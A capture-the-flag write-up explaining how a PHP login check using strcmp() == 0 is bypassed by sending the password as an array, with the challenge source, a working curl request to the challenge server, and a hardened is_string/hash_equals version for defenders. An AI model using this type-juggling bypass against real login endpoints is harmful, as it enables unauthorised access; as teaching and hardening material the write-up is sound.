Web – 208 pts (24 solves) – Chall author: eljoselillo7
Simple web challenge where we need to bypass the PHP strcmp() function.
Challenge
Solution
The website asks us for a password, nothing more, nothing less. Using the browser's inspect tool (F12), we see that it posts our input to check.php. It also tells us they have made the PHP file available to us, so of course, we take a look :).
<?php
$FLAG = (file_get_contents("/flag.txt")); //SECRET
$PASSWORD = $_POST['password']; //User password
if(isset($PASSWORD)){
    $PASSWORD = str_replace("s4cuRe_p4sW0rD","Nice_try!",$PASSWORD); //Replace
    if(strcmp('s4cuRe_p4sW0rD', $PASSWORD) == 0){ //Check
        echo $FLAG;
    }
    else{
        header("Location: /fail.html");
        die();
    }
}
else {
    echo "Give me what I'm looking for ):";
}
?>
So the correct password is 's4cuRe_p4sW0rD', but they filter it out of our input, how cheeky :c. Fortunately, or rather unfortunately, there is a vulnerability in the PHP strcmp() function. If, instead of a string, we pass something PHP recognises as an array, the comparison will evaluate as true, regardless of our input :).
I first tried to use HTML by going to the link
http://167.99.129.209:8000/check.php?password[]=oops
However, this did not work, so I used curl instead
$ curl -d password[]=oops 167.99.129.209:8000/check.php
which happily returns our desired flag
NETON{arrays_FOR_the_WIN!}
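For the defending side, here is the check from check.php rewritten so that a non-string parameter can never satisfy it, next to the loose comparison for contrast. This is an added example, not the challenge's code; the helper names password_matches and loose_check and the sample inputs are made up for illustration.

```php
<?php
// Added example, not the challenge's code. EXPECTED is the password shown on the page.
const EXPECTED = 's4cuRe_p4sW0rD';

// Hardened check (hypothetical helper). $input is whatever PHP decoded from the
// POST body: a string, an array (password[]=x) or null (field absent).
function password_matches($input): bool
{
    // Reject non-strings before any comparison runs.
    if (!is_string($input)) {
        return false;
    }
    // hash_equals() is a timing-safe string comparison that returns a real bool.
    return hash_equals(EXPECTED, $input);
}

// The loose strcmp() == 0 comparison from check.php, without its str_replace()
// filter, kept for contrast (hypothetical helper). Before PHP 8.0, strcmp() given
// an array warns and returns NULL, and NULL == 0 is true. PHP 8 throws TypeError.
function loose_check($input): bool
{
    try {
        return @strcmp(EXPECTED, $input) == 0;
    } catch (TypeError $e) {
        return false;
    }
}

// Constructed inputs, shaped as PHP would decode them from a POST body.
$samples = [
    'correct string'  => 's4cuRe_p4sW0rD',
    'wrong string'    => 'guess',
    'array parameter' => ['oops'],   // password[]=oops
    'missing field'   => null,
];

foreach ($samples as $label => $value) {
    printf(
        "%-16s loose=%s hardened=%s\n",
        $label,
        var_export(loose_check($value), true),
        var_export(password_matches($value), true)
    );
}
```

Run it with the PHP CLI on the interpreter version your server uses: the loose column for the array row depends on that version, while the hardened column does not.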